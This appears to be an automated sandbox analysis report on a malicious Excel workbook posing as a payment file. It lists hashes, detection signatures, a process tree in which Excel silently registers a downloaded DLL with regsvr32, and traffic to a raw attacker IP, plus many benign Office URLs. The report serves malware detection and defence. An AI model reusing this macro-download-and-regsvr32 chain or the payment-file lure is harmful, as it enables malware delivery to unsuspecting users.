Loading ...

Play interactive tourEdit tour

Windows Analysis Report INDIV_PAYM_633854-324967143.xlsb

Overview

General Information

Sample Name:INDIV_PAYM_633854-324967143.xlsb
Analysis ID:439080
MD5:e963ef875c44ecf140507a4d7fcd8472
SHA1:83fbf79d1327c2d42e7b52b94d35f0090ffa7f4d
SHA256:c548e534358c07290a4bebebf723d8cc96f9889d940e4082157844642bc2a82b
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6328 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 1188 cmdline: regsvr32 -s ..\jbeiwmje.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\jbeiwmje.dll, CommandLine: regsvr32 -s ..\jbeiwmje.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6328, ProcessCommandLine: regsvr32 -s ..\jbeiwmje.dll, ProcessId: 1188

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: global trafficTCP traffic: 192.168.2.5:49706 -> 185.180.199.125:80
    Source: global trafficTCP traffic: 192.168.2.5:49706 -> 185.180.199.125:80
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.125
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.125
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.125
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.cortana.ai
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.office.net
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.onedrive.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://augloop.office.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://cdn.entity.
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://cortana.ai
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://cortana.ai/api
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://cr.office.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://directory.services.
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://graph.windows.net
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://graph.windows.net/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://login.windows.local
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://management.azure.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://management.azure.com/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://messaging.office.com/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://ncus.contentsync.
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://officeapps.live.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://onedrive.live.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://outlook.office.com/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://settings.outlook.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://tasks.office.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://wus2.contentsync.
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 32D16877-2932-4116-B7E2-AF8660BF4045.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: INDIV_PAYM_633854-324967143.xlsbInitial sample: CALL
    Source: INDIV_PAYM_633854-324967143.xlsbInitial sample: EXEC
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: classification engineClassification label: mal56.expl.evad.winXLSB@3/9@0/1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{1FB7FA1B-FBF6-41F7-9C10-592B6D1EB9D1} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\jbeiwmje.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\jbeiwmje.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: INDIV_PAYM_633854-324967143.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: INDIV_PAYM_633854-324967143.xlsbInitial sample: OLE zip file path = xl/media/image2.png
    Source: INDIV_PAYM_633854-324967143.xlsbInitial sample: OLE zip file path = xl/media/image3.png
    Source: INDIV_PAYM_633854-324967143.xlsbInitial sample: OLE zip file path = xl/media/image4.png
    Source: INDIV_PAYM_633854-324967143.xlsbInitial sample: OLE zip file path = xl/media/image5.png
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\jbeiwmje.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
